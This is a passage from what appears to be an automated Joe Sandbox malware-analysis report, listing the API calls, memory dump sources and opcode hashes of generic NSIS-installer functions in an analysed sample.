                                                        • CharNextW.USER32(?,0043F000,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                        • CharPrevW.USER32(?,?,756F3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: *?|<>/":
                                                        • API String ID: 589700163-165019052
                                                        • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                        • Instruction ID: bedb2e6347f460b6a244a356934bd0223db9426f0f89d28790e15ec7ef568a4f
                                                        • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                        • Instruction Fuzzy Hash: C911B66780221295DB303B148C40A7762A8AF59754F56C43FED86732C0E77C5C9282AD
                                                        Function 004068FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                        • wsprintfW.USER32 ref: 0040694D
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                        • String ID: %s%S.dll$UXTHEME
                                                        • API String ID: 2200240437-1106614640
                                                        • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                        • Instruction ID: 6d7bab0cfc2d48cbbbe6bb2f91b005b1c0391479526b60628745523d5c0137a7
                                                        • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                        • Instruction Fuzzy Hash: 66F02B71501129A7CF10AB68DD0EF9F376CAB00304F10447AA646F10E0EB7CDB69CB98
                                                        Function 00401794 Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017D5
                                                        • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017FA
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,756F23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • Part of subcall function 004055FC: lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,756F23A0), ref: 00405657
                                                          • Part of subcall function 004055FC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID:
                                                        • API String ID: 1941528284-0
                                                        • Opcode ID: 99b6416810ddb5753ad8509ba94df8da2a36f778d9381ab1a10acee0bad54b07
                                                        • Instruction ID: 896c0c78208a39cbb5dd39340d0745d1a2bf2ace5f7797069eceb710e9101d93
                                                        • Opcode Fuzzy Hash: 99b6416810ddb5753ad8509ba94df8da2a36f778d9381ab1a10acee0bad54b07
                                                        • Instruction Fuzzy Hash: 4C41B671900108BACB117BB5DD85DBE7AB9EF45328F21423FF412B10E2D73C8A919A2D
                                                        Function 00402ECE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CloseEnum$DeleteValue
                                                        • String ID:
                                                        • API String ID: 1354259210-0
                                                        • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                        • Instruction ID: 446d876c474c9d83549856ad9cac23e68bb7371358ae7480bd0e7fa7c4692e5e
                                                        • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                        • Instruction Fuzzy Hash: 1D212A7150010ABFDF129F90CE89EEF7A7DEB54388F110076B909B21E0E7B58E54AA64
                                                        Function 00401DA6 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                        • GetClientRect.USER32(?,?), ref: 00401E0A
                                                        • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                        • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                        • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                        • Instruction ID: c57303c31a56d7bc8f2a0c5af16d3cdd50a2ae23bf22298ce01a5789fd7b985b
                                                        • Opcode Fuzzy Hash: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                        • Instruction Fuzzy Hash: B9211972900119AFCB05DF98DE45AEEBBB5EB08354F14003AFA45F62A0D7789D81DB98
                                                        Function 00401E73 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401E76
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                        • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401EF8
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID:
                                                        • API String ID: 3808545654-0
                                                        • Opcode ID: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                        • Instruction ID: 32ce691c062fdf7882ca7c79f7dc95dd78c7e40f541a0607bb82830de01dd458
                                                        • Opcode Fuzzy Hash: d16b9d3e65f9976eb005c53eb2d4e9b3ac670e2d85412e8b50a51612330472b7
                                                        • Instruction Fuzzy Hash: 3C017171905250EFE7005BB4EE49BDD3FA4AB19301F208A7AF142B61E2CBB904458BED
                                                        Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Timeout
                                                        • String ID: !
                                                        • API String ID: 1777923405-2657877971
                                                        • Opcode ID: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                        • Instruction ID: 1a2acd516b32d4a8bba1f086ee74ddb70cdd2400578aaa813c3bd98b8eca9c32
                                                        • Opcode Fuzzy Hash: a637eb720a8cb25f7279c4c7dfa93e68b81a041eba1bee5adc213dda34b2fd0f
                                                        • Instruction Fuzzy Hash: 1121A071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B88941DB98
                                                        Function 00404DA3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                        • wsprintfW.USER32 ref: 00404E4D
                                                        • SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s
                                                        • API String ID: 3540041739-3551169577
                                                        • Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                        • Instruction ID: f1ad69e943298bab6ea0b6c220370dbc78873d19d133ff1b34b391d97265b774
                                                        • Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
                                                        • Instruction Fuzzy Hash: 3011EB336041287BDB10566DAC45E9E329CDF85374F250237FE25F21D5E978C92182E8
                                                        Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DestroyWindow.USER32(?,00000000,0040321C,00000001), ref: 00403051
                                                        • GetTickCount.KERNEL32 ref: 0040306F
                                                        • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                        • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                        • Instruction ID: e0f0fd039426b51c9db09d8e0aed7b7b9f53d87474512ec8403aba9b2c913b41
                                                        • Opcode Fuzzy Hash: dba963b85b565a1be4b34eea4ba853e9dad76a83014f6dce089c5eda9641480c
                                                        • Instruction Fuzzy Hash: 93F05470602A21ABC6216F50FE09A9B7B69FB45B12B41043AF545B11ACCB384891CB9D
                                                        Function 00405F4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(?,?,0042F270,?,00405F65,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800,0043F000), ref: 00405EFF
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F04
                                                          • Part of subcall function 00405EF1: CharNextW.USER32(00000000), ref: 00405F1C
                                                        • lstrlenW.KERNEL32(0042F270,00000000,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800,0043F000), ref: 00405FA7
                                                        • GetFileAttributesW.KERNEL32(0042F270,0042F270,0042F270,0042F270,0042F270,0042F270,00000000,0042F270,0042F270, 4ou,?,00441800,00405CA3,?,756F3420,00441800), ref: 00405FB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                        • String ID: 4ou
                                                        • API String ID: 3248276644-1612631989
                                                        • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                        • Instruction ID: 6a7a19aedd3560da6e477bd72522a8c235124595f9c35bb96c459409ca5d5c37
                                                        • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                        • Instruction Fuzzy Hash: 28F0F42A105E6369C622333A5C05AAF1954CE86324B5A453FBC91F22C5CF3C8A42CDBE
                                                        Function 00405570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0040559F
                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004055F0
                                                          • Part of subcall function 00404542: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404554
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                        • Instruction ID: f144bc20a23b2fc1dad06cc698734642626ca736bc3518a3bbd7873959a32aa8
                                                        • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                        • Instruction Fuzzy Hash: 21017171100608BBDF219F11DD84A9F376BEB84794F204037FA027A1D9C7398D529A69
                                                        Function 00406096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 004060B4
                                                        • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403550,00441000,00441800,00441800,00441800,00441800,00441800,00441800,0040383C), ref: 004060CF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: nsa
                                                        • API String ID: 1716503409-2209301699
                                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                        • Instruction ID: 0f0e971a11aa9000600537ad3b21051f2e76e4828209a3ca974843c19b3e0847
                                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                        • Instruction Fuzzy Hash: B5F09076B40204BBEB00CF69ED05F9EB7ACEBA5750F11803AE901F7180E6B099648768
                                                        Function 00405FCC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FDC
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FF4
                                                        • CharNextA.USER32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406005
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,004062B1,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040600E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2559277724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000003.00000002.2559261353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559293898.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559309155.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_400000_QNuQ5e175D.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                        • Instruction ID: b896d6fd3cda69cb85c158c7a33f171d68b8f81fed19edc6c2f6f75b2124ada4
                                                        • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                        • Instruction Fuzzy Hash: 64F0F631104418FFC702DFA5DD00D9EBBA8EF45350B2200B9E841FB250D674DE11AB68